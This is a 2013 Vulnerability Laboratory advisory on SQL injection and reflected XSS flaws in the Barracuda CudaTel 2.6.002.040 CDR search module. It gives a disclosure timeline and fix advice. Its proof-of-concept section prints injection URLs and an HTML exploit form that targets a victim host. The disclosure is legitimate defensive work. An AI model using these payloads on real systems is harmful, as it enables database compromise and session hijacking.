扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 |
Title: ====== Barracuda CudaTel 2.6.02.040 - Remote SQL Injection Vulnerability Date: ===== 2013-07-20 References: =========== http://vulnerability-lab.com/get_content.php?id=775 BARRACUDA NETWORK SECURITY ID: BNSEC-723 VL-ID: ===== 775 Common Vulnerability Scoring System: ==================================== 8.6 Introduction: ============= Designed to enable seamless voice and video communication, the CudaTel Communication Server is an easy-to-use, affordable, next-generation phone system for businesses. CudaTel Communication Server s enterprise-class feature set includes Voice over IP (VoIP) PBX services, conferencing, follow-me, automated attendant services, and more, controlled by an easy-to-use Web interface. CudaTel Communication Server is compatible with any SIP device and provider, and can be pre-configured for use with both analog and digital telephone networks. Powerful, Complete Solution With an expansive feature set and and no per user or phone licensing fees, the CudaTel Communication Server is equipped and priced for organizations of any size. Native High Definition audio support and integrated phone line (TDM) hardware produces an unparalleled audio experience. VOIP encryption protects calls from hackers and digital eavesdroppers. (Copy of the Vendor Homepage: http://www.barracudanetworks.ca/cudatel.aspx ) Abstract: ========= 1.1 The Vulnerability Laboratory Research Team discovered a sql injection vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. 1.2 The Vulnerability Laboratory Research Team discovered a client side vulnerability in Barracuda Networks CudaTel v2.6.002.040 appliance application. Report-Timeline: ================ 2012-11-26: Researcher Notification & Coordination (Benjamin Kunz Mejri) 2012-11-27: Vendor Notification (Barracuda Networks Security Team - Bug Bounty Program) 2012-12-01: Vendor Response/Feedback (Barracuda Networks Security Team - Bug Bounty Program) 2013-03-01: Vendor Fix/Patch (Barracuda Networks Developer Team) [Manager: Dave Farrow] 2013-07-20: Public Disclosure (Vulnerability Laboratory) Status: ======== Published Affected Products: ================== Barracuda Networks Product: CudaTel - Communication Server 2.6.002.040 Exploitation-Technique: ======================= Remote Severity: ========= Critical Details: ======== 1.1 A SQL Injection vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The vulnerability allows remote attackers or local low privilege application user accounts to inject (execute) own SQL commands to the affected application dbms. The blind sql injection vulnerability is located in the cdr module when processing to request manipulated row & page parameters as searchstring. A remote attacker can for example delete the standard value context of the module request to inject (execute) own sql commands. Eploitation of the vulnerability requires a low privilege web application user account and no user interaction. Successful exploitation of the vulnerability results in datbase management system and web application compromise. Vulnerable Section(s) [+] search - listing Vulnerable Module(s) [+] cdr - seachstring listing Vulnerable Parameter(s) [+] &row [+] &page 1.2 A client side input validation vulnerability is detected in the Barracuda Networks CudaTel v2.6.002.040 appliance web application. The non-persistent vulnerability allows remote attackers to manipulate client side application requests to browser. The secound vulnerability (client side) is located in the invalid value exception handling. Remote attackers can provoke the exception-handling by including invalid script code inputs to redisplay the malicious context when processing to load the output. To provoke the exception-handling the remote attacker can use the vulnerable row parameter of the cdr searchstring listing to execute own malicious (client-side) script code. Exploitation of the vulnerability requires a no web application user account but medium or high user interaction. Successful exploitation of the vulnerability results in client side phishing, client side session hijacking and client side external redirects to malware or malicious websites. Exploitation requires medium user interaction. Vulnerable Section(s): [+] search - listing Vulnerable Module(s): [+] cdr - seachstring listing Vulnerable Parameter(s): [+] &row Affected Module(s): [+] Exception-Handling (invalid value) Proof of Concept: ================= 1.1 The sql injection vulnerability can be exploited by remote attackers with low privilege web application user account and without user interaction. For demonstration or reproduce ... Standard Request: Row 100 http://cudatel.127.0.0.1:1336/gui/cdr/cdr?_=1353973149509&since=1+day&search_string=&rows=100&page=1&sortby=end_timestamp&sortorder=desc Standard Request: Output --- 1. {"count":0,"page":"1","cdr":[],"rows":"100"} Manipulated Request: http://cudatel.127.0.0.1:1337/gui/cdr/cdr? _=1353973149509&since=1+day&search_string=&rows=100&page='1+1%27[SQL-Injection!]%27--&sortby=end_timestamp&sortorder=desc ... or http://cudatel.127.0.0.1:1337/gui/cdr/cdr? %20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows='1+1%27[SQL-Injection!]%27--&page=1&sortby=end_timestamp&sortorder=desc Manipulated Output: --- 1. cdr: [] count: 0 page: 1 rows: 1+2 --- 1. cdr: [] count: 1+2' page: - '1335 - '1336 - '1337 - '1 rows: -1+1'[SQL-Injection!]'-- Exploit (PoC): <html><head><body><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-9"> <title>Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection [PROOF OF CONCEPT]</title> <script language="JavaScript"> var path="/gui/cdr/cdr" var adres="?%20%20_=1353973149509&since=1+day&search_string=&page='1335&page='1336&page='1337&rows=" var domain ="http://cudatel.127.0.0.1:1337" var sql = "'1+1%27[SQL-Injection!]%27--" function command(){ if (document.rfi.target1.value==""){ alert("NOPE!"); return false; } rfi.action= document.rfi.target1.value+path+adres+domain+sql; rfi.submit(); } //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Vulnerability Research Laboratory (www.vulnerability-lab.com) //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- // Greets: Ibrahim EL-Sayed, Chokri Ben Achour, Mohammed ABKD. & Stealthwalker //=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- </script></head><body bgcolor="#000000" link="#990000"> <center><p align="center"><b><font face="Verdana" size="2" color="#006633">Barracuda Networks CudaTel [CDR] (ROW&PAGE) - Remote SQL-Injection Exploit</font> </b></p><form method="post" target="getting" name="rfi" onSubmit="command();"><div align="left"> <p><b><font face="Arial" size="2" color="#006633">VICTIM:</font></b> <input type="text" name="target1" size="53" style="background-color: #006633" onMouseOver="javascript:this.style.background='#808080';" onMouseOut="javascript:this.style.background='#808000';"></p> <p><b><font face="Arial" size="2" color="#006633">EXAMPLE:</font><font face="Arial" size="2" color="#808080"> HTTP://VULNERABILITY-LAB.COM/[SCRIPT-PATH]/</font></b></p></div> <p align="left"><input type="submit" value="Execute INPUT" name="B1"> </p><p align="left"><input type="reset" value="Clear ALL" name="B2"></p></form><p><br> <iframe name="getting" height="337" width="633" scrolling="yes" frameborder="0"></iframe></p><div align="left"> <p align="center"><b><font face="Verdana" size="2" color="#008000">VULNERABILITY-LAB <a href="mailto:research@vulnerability-lab.com"> BKM</a></font></b></p></div></center></body></html> 1.2 The client side input validation vulnerability can be exploited by remote attackers without application user account and with medium required user interaction. For demonstration or reproduce ... PoC: http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509&since=1+day&search_string=&rows=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&page=1&sortby=end_timestamp&sortorder=desc http://cudatel.127.0.0.1:1336/gui/cdr/cdr? _=1353973149509&since=1+day&search_string=&rows=100&page=1%27[%3Ciframe%20src=http://www.vulnerability-lab.com%3E]&sortby=end_timestamp&sortorder=desc Note: We only verified the bug with the same exception in a not parsed parameter but the bug itself is located in all areas of the invalid exception. Solution: ========= 1.1 To patch the sql injection it is required to parse the row and page parameters in the cdr module. 1.2 To fix the client side xss vulnerability parse by encoding the row parameter and restrict the input. Encode the affected exception-handling output listing when processing to display invalid input values. Note: Barracuda Networks provided an update of version 2.6.002.040 to v2.6.003.x to all clients and customers in the bn customer area. Risk: ===== 1.1 The security risk of the remote sql injection web vulnerabilityis estimated critical. 1.2 The security risk of the client side input validation web vulnerability is estimated as medium(-). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact:admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section:www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright � 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com |
体验盒子
